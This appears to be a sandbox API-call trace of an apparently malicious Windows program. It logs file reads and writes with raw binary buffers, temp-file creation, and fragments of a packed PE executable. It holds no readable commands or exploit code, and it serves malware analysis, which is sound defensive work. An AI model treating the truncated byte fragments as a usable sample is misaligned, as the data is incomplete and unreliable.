Buffer => \x0b2}\x99\xfeL\x82m\xf4\xb7p>\x0b\xb4\x02\xdc\xf4^s\x8e\x0b\x98~I\xf4"\xd0\x00\x0b.K\x99\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x8846\xb8\x9c\x11x]S\xd9H\xd8\x97\x81\x03&\x9c\xb4\x9e\xb08\x93\xac"gl\x9d\x89\x88 g\xdf\x88\xa4\xf3\xa2\x88&?}\x88\xed\xa3T\x88\x05\xe9]\x97Tl\x19\x9cc,3 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,428 | 364 | NtReadFile |
Buffer => \xa2\x92`<\x19\xa3\x8e\x99M6Y(F(\xa2]Y\x9d\xd1W\x9d\xc5\x9fC\x9d\xc5\x9e\xc8\xf6\x8fe\xf9\xc3\xccV\xbb,cHg\x97\xd8\x8d\x9c\xfc\x9b\xa8J\xfc\x9b\xa8A\xfc\x9b\xa9/8\xc3\xe7s\xfc\x9b\xa9OX\xc6y_\xa3\xc9\xc8\x1f\xbc|[\xd3\x0c\xdbw\xe9g\x91\x86-\xb7\xaf\x14\xd4\xa8\xb2j\x9d\x0c\xdbZ\x06\x85\xd8\xc8(j\x14\xf6\xe1~\xd7|\x1d; \xa9^p;7Yjb=:j|\xf57~\xd7y\x93 >_\xfd\xd0\xe6\xc7\xf2\xcf\x02\xf1m\xd0A\xbc@\xdb1\xee\x9f\x1fi\xa0v\xc4\x87\xda\xbe\xd05`\x8d\xe4\x9d\xcaL\x14\xa4;\xc9\x84\xe4\x914\xb0\x805c\x03\xcb\xd8\x1e\xdb\xca5\xca\x84\xe4\x90\xc4\x0b\xf4\xb7m\x8eN\xd9\xe1\xd8O\x85v~-gA\xdaS\xd2\xd4\xdaZ4ha\xea\xe5D\xdaS\x0f@\xb1\x19'<\xc6w\xae\xa5\xf9 P\xd1"\xcd\xcax"\xcdj\xe96\xf4L\x07\xa6\x0e\xf5G)\xb8Xm)\x9aZ\xce FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,428 | 364 | NtWriteFile |
Buffer => \xa2\x92`<\x19\xa3\x8e\x99M6Y(F(\xa2]Y\x9d\xd1W\x9d\xc5\x9fC\x9d\xc5\x9e\xc8\xf6\x8fe\xf9\xc3\xccV\xbb,cHg\x97\xd8\x8d\x9c\xfc\x9b\xa8J\xfc\x9b\xa8A\xfc\x9b\xa9/8\xc3\xe7s\xfc\x9b\xa9OX\xc6y_\xa3\xc9\xc8\x1f\xbc|[\xd3\x0c\xdbw\xe9g\x91\x86-\xb7\xaf\x14\xd4\xa8\xb2j\x9d\x0c\xdbZ\x06\x85\xd8\xc8(j\x14\xf6\xe1~\xd7|\x1d; \xa9^p;7Yjb=:j|\xf57~\xd7y\x93 >_\xfd\xd0\xe6\xc7\xf2\xcf\x02\xf1m\xd0A\xbc@\xdb1\xee\x9f\x1fi\xa0v\xc4\x87\xda\xbe\xd05`\x8d\xe4\x9d\xcaL\x14\xa4;\xc9\x84\xe4\x914\xb0\x805c\x03\xcb\xd8\x1e\xdb\xca5\xca\x84\xe4\x90\xc4\x0b\xf4\xb7m\x8eN\xd9\xe1\xd8O\x85v~-gA\xdaS\xd2\xd4\xdaZ4ha\xea\xe5D\xdaS\x0f@\xb1\x19'<\xc6w\xae\xa5\xf9 P\xd1"\xcd\xcax"\xcdj\xe96\xf4L\x07\xa6\x0e\xf5G)\xb8Xm)\x9aZ\xce FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,428 | 364 | NtReadFile |
Buffer => )v\xc2\x81\xc6\x9b7\x07\x16!<v}k*k\x16!<8\xc6\xcc7\xea\x16!<z\xcd\xcc\xaes\x91%\x9ffj*.\xd2\xaera\x9b\xaera\x81\xc2\xca@\xb3\xe0~\xd3SaR\x19)\xaera\xc4A@\xd7\x1d\xa5\xfa\xd0z\xa5\xfa1\xd7\x15]\x06\x91\xa5\xfaT\xee\xa6<\xfad\xa5\xf9j=\xb1{-\x8eyP\xd2^F\x07-\xce\x96ex:\x9d\xea=\x95\x96\xb6\xfch\x89[\xe8F-M\xf9\xa8F\x07-\xc6\xc6\xacq\xb1=\xa3\xc5\x15"\x16\x9a\x8e=\xa3\xc09\xf9\xfb\x8fH\xf9\xfb\x8f\=\xa3\xc0\x9e"\x15\xfcy>\x1a\xeeV\x01M\x10\xaa\x01M\x10\xb8\x01M\x11%\xc5\x15Z\xe1\xda\xa0 q\x01M\x11\xd7\xda\xa0\x7f\xb1e\x9e\xa3a\x8a\xdd)\xca\x95\xf1\xd1\xfa\x9e\x91\x17\xad\x81'
\x92\x9e\x91\x17\x7f\x8a\x05\xbdu\x95\xa4\x8a\x00\x1c\xc0\xf3\xe1\xec\xfa\xd0>\xf3\x06\xe6^H\xddXB\xf3\x08\xc2N\xf8z\xe1L\xf8z\x11/\xe9#\x0cL FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,428 | 364 | NtWriteFile |
Buffer => )v\xc2\x81\xc6\x9b7\x07\x16!<v}k*k\x16!<8\xc6\xcc7\xea\x16!<z\xcd\xcc\xaes\x91%\x9ffj*.\xd2\xaera\x9b\xaera\x81\xc2\xca@\xb3\xe0~\xd3SaR\x19)\xaera\xc4A@\xd7\x1d\xa5\xfa\xd0z\xa5\xfa1\xd7\x15]\x06\x91\xa5\xfaT\xee\xa6<\xfad\xa5\xf9j=\xb1{-\x8eyP\xd2^F\x07-\xce\x96ex:\x9d\xea=\x95\x96\xb6\xfch\x89[\xe8F-M\xf9\xa8F\x07-\xc6\xc6\xacq\xb1=\xa3\xc5\x15"\x16\x9a\x8e=\xa3\xc09\xf9\xfb\x8fH\xf9\xfb\x8f\=\xa3\xc0\x9e"\x15\xfcy>\x1a\xeeV\x01M\x10\xaa\x01M\x10\xb8\x01M\x11%\xc5\x15Z\xe1\xda\xa0 q\x01M\x11\xd7\xda\xa0\x7f\xb1e\x9e\xa3a\x8a\xdd)\xca\x95\xf1\xd1\xfa\x9e\x91\x17\xad\x81'
\x92\x9e\x91\x17\x7f\x8a\x05\xbdu\x95\xa4\x8a\x00\x1c\xc0\xf3\xe1\xec\xfa\xd0>\xf3\x06\xe6^H\xddXB\xf3\x08\xc2N\xf8z\xe1L\xf8z\x11/\xe9#\x0cL FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,428 | 364 | NtReadFile |
Buffer => b$z\xa2]s\x85"\x92\x17\xf9N69\x97V\x99+\xce']s\x85/\x99+\xce\xa8\x86\x9e\xd1y-r<\x8c\xd6}\x88\x99\xc26\xce\xa5\x12%\xc3jS\xa7\x13\xc5\xc2\xd6\x01(\xd6}\x8dB\x12%\xc2\x02F\x93P\x83\xb6\xa9x\x9b\xa9\xfajj\xfd\xf6\x17U\xa9\x1fo\xe2\x12\x8e\xc1\xf7\xb3l\xafW\xa2)cu\xeal\xa0\x10\xbeq(\x89\x05R\xdd\x91\xbeq\x1d\xb3\x11c\x11]\xd5;_\xfb\xb9\x87U\xea\x05\xa9T\xea\x11\x93\x81u\xe4l~\xe5\xf5)H\xaa\xf5)f\x94\xea\x9c5\x19\xf5*S\xe1E\x8e\x10\xff\xea\x9c5\xdf\xc8\xb2\xdf\x99\xf7\xe5!\xe6'_.\xef\x9c\xaeHd,\x08\xd5_'w&\xf8'|*\')A\x1b\xe9%\x91\x8c
\x9f\xcc(\xbd1O\x12
\x9fu;\xd6rn\x08\x19\xa6r\x9b
\x9fUB
\x9c7\x87\xb2\x97\xc1"\x8d\xc0?\xd7\x8d\xc0<\xaf\xd6\xb8\xec\x91\x8d\xc0?\xc9B^\xa3\x04\x8d\xc0?\xd2I\x98u\x83 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,438 | 364 | NtWriteFile |
Buffer => b$z\xa2]s\x85"\x92\x17\xf9N69\x97V\x99+\xce']s\x85/\x99+\xce\xa8\x86\x9e\xd1y-r<\x8c\xd6}\x88\x99\xc26\xce\xa5\x12%\xc3jS\xa7\x13\xc5\xc2\xd6\x01(\xd6}\x8dB\x12%\xc2\x02F\x93P\x83\xb6\xa9x\x9b\xa9\xfajj\xfd\xf6\x17U\xa9\x1fo\xe2\x12\x8e\xc1\xf7\xb3l\xafW\xa2)cu\xeal\xa0\x10\xbeq(\x89\x05R\xdd\x91\xbeq\x1d\xb3\x11c\x11]\xd5;_\xfb\xb9\x87U\xea\x05\xa9T\xea\x11\x93\x81u\xe4l~\xe5\xf5)H\xaa\xf5)f\x94\xea\x9c5\x19\xf5*S\xe1E\x8e\x10\xff\xea\x9c5\xdf\xc8\xb2\xdf\x99\xf7\xe5!\xe6'_.\xef\x9c\xaeHd,\x08\xd5_'w&\xf8'|*\')A\x1b\xe9%\x91\x8c
\x9f\xcc(\xbd1O\x12
\x9fu;\xd6rn\x08\x19\xa6r\x9b
\x9fUB
\x9c7\x87\xb2\x97\xc1"\x8d\xc0?\xd7\x8d\xc0<\xaf\xd6\xb8\xec\x91\x8d\xc0?\xc9B^\xa3\x04\x8d\xc0?\xd2I\x98u\x83 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,438 | 364 | NtReadFile |
Buffer => \xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x921e\xcbb*7\xe9\xc6%\x82\xe0}r\x1b"v\x8b\x1f\xaf\xf2H?\xdagO\x9a?m\x99hD FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,438 | 364 | NtWriteFile |
Buffer => \xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x921e\xcbb*7\xe9\xc6%\x82\xe0}r\x1b"v\x8b\x1f\xaf\xf2H?\xdagO\x9a?m\x99hD FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,438 | 364 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,438 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001a4 |
FAILURE | 3221225489 | |
| 07:44:02,438 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:02,448 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:02,448 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:02,448 | 364 | NtCreateFile |
ShareAccess => 0 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp2.tmp DesiredAccess => 0x80100080 CreateDisposition => 2 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,458 | 364 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp1.tmp DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,458 | 364 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp2.tmp DesiredAccess => 0x40100080 CreateDisposition => 5 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,458 | 364 | NtSetInformationFile |
FileHandle => 0x00000188 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:44:02,458 | 364 | NtReadFile |
Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PE\x00\x00L\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x0f\x01\x0b\x01\x07\x00\x00`\x00\x00\x00\x10\x00\x00\x00\x80\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,458 | 364 | NtReadFile |
Buffer => \xff\x87\xa8\x90\x00kernel32.d\xff\x9b\xe7\xdfll5root\IEFrame\x00ATV\xfe\xff\xfcH_Noterctrl_renwnd\x0f\xff\xb7\xff\xff|y_\xee\xcf\xb9\xdd\xdeg;\x84\x15\x80\xd4\x00\x1e8 \xb2\x9f\xfb\x15\x00\x8d\x06\x18x\xb6\xff\xff\xff\x0f@@\x03\x00\x1d+\xf4A\x81O\xcd\xfc\xff\xd7%k\x08\x00\x01@<\x8fS\x016@\xffn\xff\xdfT\xf1\xfd\xa73\xbb\xbd\x9aA\x14\x04W\x85\x0e\x06@]\x10\x00\x18\x04/\xb7\xdb\xdd@\x08\x1f\x00-
\x03y(\x07\xa4,\x8a\xdc\x02\x97\xbf\xfc\xe5\x00\xbe\x0e/\x1b\x00\x00\xbf\x06\xa78\x04\x00\x85/\x05\x13\xb7\xb7\xff\xf2\x01\x00\x15]\x8e_\xce\x0bDec\x00\xa3v\x00O\x9f\x00S\xdd\xbe\xfb\xdbep^ug\x00Jul\x03n\x00May\x0fprk\x97\xed\xcd\x07\x03Feb\x13aSa'\xdds\xb7\xed\x7fi\x00Thu FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => e\xcf\x97\xe0 \xb7\xbf\xf5\xcd\xba\x04{$t|\xf3 $T},{\x0c{M\x07\xadf\xe0|m}\x1c \xf9U\xc4\xe0\xf6`m|\xa4\x02} \x8c\xd8\x02\x0e\x0c\x9d@\xd4|
1\xd6\x1a\x0ci\x18\x1d@ \x8b\x02\x97(.\xd9d \x94\xbc\x83?hm $A+rm b\xedo
\x9aXM){:|,}|\x01m\x83\xdf\x02\xa2t\x14 kTw%\x95h\x1d|\x19|\xda ,\x86_{\xef\xa0\x10t}{.|*)\x00}m\xad\xb5\xdb
\x01{W\x1f'\x88.d6\x13G\xa2<\xd0|f_\x05r\x9fh\xad\xdd\x0cei\x17u\x083s}\xdb]\xbb{i^|Y}\x1f\xdce{-Amm\x9bD{\xd0\x06\x93\x1c{!\xb0\xdd\xe0\x16BbeL|w\x08}n\xad\xb5\xf7\x05d\xaf\x06O\xe6\x1dla\xebZ\x8b\x0e\xb4|\x7f\x04\xf5m1\xd6\xa0\x15\xde\xde\x19\x08\x1b\xdbV\xe8h\xeeci|\xcf\x81m FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \xd4\x80l\x14\x85dW\xa9\xd4\xfeL$w{S\x17\xf9\xd2un\xb7] d [\xe5]|\x08i|\xeb\xc2\xbe\xafZ\x96-\x00 \xe4a\xb1\x1c\x07\x0cnrR\x9b\x1e\x98\xc5\\xfb\xda\xa7n\xfbfSm\x82\xb0=C\xac\x1a8P\xdf\xbdt\xb6\x1a\xc1fvMa\xa0c\x14k\x06\xae\xc6 \xb3\x93\xcd\x1e\xce\xf3R\x80g@.\xb7=Zk\x00\xb8\xeb1\k~\x0c\xda\xe3\x89\x0bh\x96\xaa\x89\xb9\x9c\x9b\x14TDFQ\xe2\xedSk1\xbe\xbd{>\x00 MA\xdc\xb6\xe8\xde\xef F{\xe2|\xfbM\x16$f^s}3s\x00 50$\xfb
_`{P\xea5R.\xb8RA5\x1a[\xd7\xd5\x88 D\x00_\xec\x034\xf7\x11U^
\x14|A\xfa\xcd\xe1\xc0\xc0R\xa3s\x11\x97\x01\x96\x1a\xcb\xbakgSf\xbc\xf7
,554 \xf1UI\xb5\xb6\xd0\x96\x8eo\xb8\x14xU \x89\xd6\x96\xd4MM\xa8\xc7\xc8\x1c\xe0\x0e\xcc\x10 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \x18nM\xe7\xe8\xd2R\xc1/l1o\xb6Ex\x0b\x94v`
D6.\xa9\xb26+|\xccu\x040\x003IMEO(4\xfb\xd0\xc8U\x89\x80PBy@\xb2\x9d\xa1\x01M\xce\x1e V9\x1d\xae\xb66\x01\x9bCB2-*\x94\xb6\xd6Ty\x94@mX\xd5\xb8m\x0b\x1b\xact/\xf3xG;! b\xed-\xbc\x1d\xee\x11y="N"1\x00\x0f4\xf4k\x05q-V\xcei\x801h\xce\x11kO\x18\xfcC\x07b\xad\x19h\x98j\x8b
1\x17\xd0\xa0a\x06\x85
7\xd6>1\xac\x9f
\x8b=_\x0b\x02>\xceO\xf7.3u\x0448X.\xe3N\xda\x8b\x99kP\x8cs6+\xb0\xf7f'\xbdI?G\xc1\xa9\x02\x94\xbaa\xcd\xff r\xb4V\x18/\xde\x18\x17\xb96s\xf0\x99\xd8\xcan\xcf\xc64\x8d
zZjf0E\x88lC\xdb\xa1o~Ab164"\xbd\xd7\xd4\xb8D\xfb@iQ\xb8\xda\x0b\xd8\xe9H\x84L\x8f: FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \xc8\xf4j\xf5a\x07\xf6v\x97\xcd\xc2f\xf7\xf8.\x8c\xf9\xfax\xfbe\xdfo\x1a
J\x07\x88\x8bE\x08\x8b=\x84\xd8\x8d~v\xe1\x7f@\x83\xc0\x04QP\x89\xb9\xff\xd7\xee\x89]\x089\x85\xf3\xe5\xd6\x02\\xd8\xfeu\x0eh\x18@\xdf\xa6{\x9f\x80\x0cP\x0e\x98|8\x9d!\x0f/\xd6\xcd\xdc\x84\xa9\x9f-&xV\x0cv\xd2\xf0\xfeI\x80<\x08\t\x0e\x19<\x90\x8d\xa3\xa6{v\xd8P+\xd6\x08j 6t(\xd8w\x0b\xdf\x80Ij\x02Sj\x034\x02\x7f\xd39\xd3\x1cp;\xc3t2\x83\xf8\xff|\x92\x1dv\xbaclph\x0cG:&4\x14\x10\x11d\xeb\x10\xdf\xee\xccd%`>u\x0f\xff\xfb\x83}\x08\x02\xb8\xc3\x9a\xe1\x0f\x8c\x19k\xcf u\xfd>\x9a\x91b,\x1f<5\x90W\xd6-<:w\xbfudP\x0b\xc4bi\x9a\xa5\xc7h\xc56\xc4\xc5\xc6\xa6i\x9a\xa6\xc7\xc8\xc9\xca\xcb\x9a\xa6i\x9a\xcc\xcd\xce\xcf\xd0\xd15M\xb3m\xd2s7\xd3\xd4 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \xc9\x08:\x02\x18AB\xeb\xedP\x01\x02/\xff\xe2\xf1
+\xc17'VW\x8b}\xf6\x89u/\xd0q\xe1\xf8\x80?I\x84H+S\xd6>&\x0f\xcc\xd2\xdd\xdc\x851
\x16\xfcF
##\xeey\xe2\x97\xf3F\x0f\xbe\x04>\xca\x11Y\\xdf\xda\xffo\x0e\x88D\x1d\xdcCF\x83\xfb\x0fr\xe2\x80d
%\xc98M\xdc\xf87\x13\xb7\x89\x7ft\x16\xc6/\x10@\x8d\x0c\x89\x808\xbcs\x05\xde\x1fLJ\xd0\x83\x17O;u\x01F\x19'~7\xde\x8e\xce\x00Tj\x14\xef\x99\xb7\x13M\xb8\xf8\xa2=\xba\x96 ]\x8e\x16\x8b\xdb\xdd\x88\x19\xeb\x16\x10%pD\xb9\xb5\xa5\x08\x90P
\x7f\xb8\x10\xee\x16\\xb7\xff\xdc\xb0\x8bB0\xfc +\xf3Pa\x07\xcf\xda\xae\xf4\xc4;\xf0\xedtQ+\xfe\xd9\xbf\xb5\x03\xf3\xee\x1c>\x8d4\x08\x03\xf7\x1a\x8b\xcf+\xcb;\xf3\xf5[\xbb\xd4\x8d\x15s\x1b\xf7\x85~+\x8b\xc3+o\x7f\xfb\xb6'\x03/\x8a\x143\x88\xadF;\xf1|\xf5\xeb FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \x94\xfc\x8e\xcd\xb1`\xc6\x02\xa5f\x01\xd7\xaf\xfd\x9d\\x85g\xa5%\xff?\x0bT\xf6\x8d\xc6\xbb\x12\x04|\xa6\xeb\x0biv|7\xff.\xa8\x99\xfeJ\xffN\x85\xf6\x7f\xf4\x80$\xf7@^t\x03\xf7\xfa\xc4\xad\xa9\x92\xa7\x1a\xe70P[\xcc\x10\xcex{F\xae\xc8\xf6\xb1u\xe8^\x1b(\x05Z\xe9\xaf\xa0j\x0cX
\xcb#p\xdbxk<\x02\xf4}\x079\xe9\x16+u\xbf\xd8\x85\xa1ESr\x8b\xdeP)&\x85\xc1n\xf0\x8b\xd8Y;\x17Y|\x1fs\x00\xd4m[\xdbF
\x03N\xd6\xc15\xf8\x08\x06n\xb3\x80\xeb(\xf4T\xe0\xeb\x03:\x8b\x0eXp/\xb5\xd2\xc9\x14\x01\xddx\x01\x19\xd8\\x10\xbd\xdc\xee\xa2|\xcd\x12a`\x7f \x8dC
\x1a\x14L\xd7\xde5\x9c\x02I\xdeRa\x12\xa1C\xe9\xe9C\x12\xd8\x05\xeb\xee\x0c\x83\xc3\x06\x0e\xe2
\xe4Cw[-a\x8fK\xc3W\xe8>\x7fa\xbe\x03\x03f\x80$\x80\xfa\xd01!@\xf7\xf6\xf8\x85\xff\xab\xect FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \x19-\xfbY\xfd\xd3\x04k\xc0X\x06\xf5\x9b\xfb\x95\xe5d\xe1:\xf9\x83z\xfftb\xd1\xfdv1.1-\x05\xe9 \xef\x8e\x0c\x0b\xa1\x04\xf9\xc3\x8b\xab\xa9mF\x17\xb6\xf8WH\x80\x03\x80\xea\xd0\xae\x85.@2<\xae\xba3Hm\x87tSg\x10^$\x01w\x90\xc1\x0f\x0c3\x8a\x0e\xd6\xf4m\x1c`\x15\xe2\x9dY\x13\x1fl[\xa3c{u\xc5\xbb,\xc0\x1c\x0c\xdb\xe2\x99\xcd0\x08\x1d\x17F27\\xe2\x96\x05u\xe3\xd9\x89\\xd9<<@\xb1\x92\xcb\xdet?(T\x14\xde\x7f\x15\xacwx\x97\x88\x04+CY<\x19\x16\xba\xc1J\xbdo@\x987\x8cTk\x89\xedzO\xf9\x04+\x017 \xdd\x83\x1f\xd8\xebP\xc4+@\x0f\xc2\xce\x16\xb2\x98\x15*\x85\x0b\xdd\x8e\xe4+\x06^+@\xdcK%\xdc\xb6\xd5y\xada+\x15\x8b\x83\xb3\xc0\xb67h\x11q\xf7\xeb>>\x06=g\x89#{\x13\x8a\x06<\x1b\xa6+j\xb2w\x89\x80\xe4t\x0f-\xcdY\xd7x
\xd0 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \xe2\xc4\xc7\x0f\xa7\x0ej\xc3\xe2-\xd8\xd9D=\xeb?W\x16\xddb\x18\xf0\x80f\x05\x00\x95\x1c\x01\x8a\xaf\x99\xb0K\xcf\x88\x06d\x84\xa1|\xb9\x88\xb5h\x1d$\x85\xd1e\xe8P\x93\xc8\x04yP\xa1\xb3$
x\xfe
P\x1f5\x0b\xb5<g,\x14c\xfe;7{\x13\xf2)\xfc\xfcl0\x12\xfef\xcf\xd9<-\xfc
\x1e\x17=\xfcY'\xdb\x16\x86I4\xff\xd7\xe4\xe0\xfe\xbaX8\xf2\x08\x16\x17\xce7\x04YH\x06\x8d\x8c<Zb\xd6\xb6\xad\xeb\x88\xb0\x84\xa9\xcdn\xf1\xeaey\x98\xf9!\x06F>\xcc\xa6\x1a\xaa\xf8,\x84\x8c2\xcc\x06\xc4.\x95\x1c\x14\xf7\xf6*>\xf5\xee\xbb\x8fbt'A;\xca|\xf4\x0bh\x83\xc0
`\xa4\xf8h-\x0c\x0c\xe7\xf4&d\xa8\x7f5R@j\x7fP\x10V\x80Pg\xce x-P\x9e\xef\xbe\xc3w!"Vc-t#Vh\x7fG\x0b\xee\xe7{\xb5\xb7\x9c\x83\xc5x\xf4\xfe\x94d\xc1\x158\xb8\xed\xfb\x10\xed+\x1a\xbe
FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => 3\x18l_a^\xfd[\xcc\x08p\x9b\xd9\x88\xd3}8\xd6\xc4]j\xfb\x0b\x8d\x8d_\x01O\xf8\x8d\x1e\xff-\xbcu]5\xb3\x15\x85P\xcf~\x13\x04D\x96\x1c\x17*\xaf\x94\x10\x17\xd9\xccI]\xa8\x117\x9f\x7f\xed\xb9\x12}#\xbe\x11\xcf\xbe\x19\x140\x80\xba\x18\x16@Y|\xed\xeb\x0e\xb7\x1a5\xe9\x141b\xb7\xc8|r+\xfc\xff\xee\x8dQ\x03;\xd0}e;\xcf}a;\xc1WO\\x06\xbf\xb56\xd8\xbb!H\x12O\xd8\xf8;\xc2~C\xb5\xe2M\xfc;\xc7~?+\xc1\x0c\xff\x07|6Km\xb1\xd1/\x16\x03\xce;\xd7}\xac\x01\x8f\x15\xd1\x10|S\x11BA\x81\xfa\xfeR\xe9\x1eH\xf5Z\xf7\x1076;[\xe6\xc2\x97\xcb\x8b\xfb;}\x0c\x8c1\x89\x8b6u\x12mB_h\x14\x11h\x10\x14X\x08\xb8@-V\xc0\x83\xc4\x06Mu\xb5>\xe3V\xea\x00\xcaI\x00\x03\xfa\x80\xd7`\xb0\x07(p(\xecm\x1d\xb5(\xd1\x8f\x9a{W\xce\x0f\xc2\xaeD\x13 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
Buffer => \xbd\x05PO\xd5\x05\xb3\x16?\x80<8\\xf9\x19<;\x10g\x0e\x15]\x11x\x18\xc9r\x8c\x93h@k\xa4\xfdV}\xb6\x95*\xfb\x92\xfc\x15Pu#\x00\x91\xa7\xe05\xd90\xe0X1\xbbzu\x03#O\xeb\x11\x1f\xce\x8a\x8f\x98$k\xac\xd7\xbd\xd0\xe7f\xdbp<;\x1b\x08\xd1\x00t\xae\xcc0\xb2|\x11 \xd2\x9c\x0fZ\xbeQ6\xd9\xc5P\xbeTP\xb7\x88}\xc9+\x13\xf6\xa5\xcc j
\xbb\xc0\x84K(\x89\x0cH"A\xd8QvVB\xa9JCH'X\xe1\x17\xb1\xb5\xd4P-Yy\x19\xf8\xf8\xa0\xb1\xbc\x1cN[u\xca\x03N\x19F\x9b\xb4\x18\xaf
\xa6i\x9a^g\xe5Loc\x82\xa6i\x9aal Se\x96eY\x96\xf0tting,[AYs\x92Te,\x9b\xe5\xb6mF\xd3p\xd4\xd5r\xd6l\x9bm\xd7\xd7\x07\xd8yJ\xd9\xdaI:\xdb\xd7u]\xd7\xdcF\xdd/\xde\x1b\xdf\x0f\xe0\x0b\xd34]]\xe1\x13\xe2L\xe3\xe4\xe5\xa8 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,468 | 364 | NtReadFile |
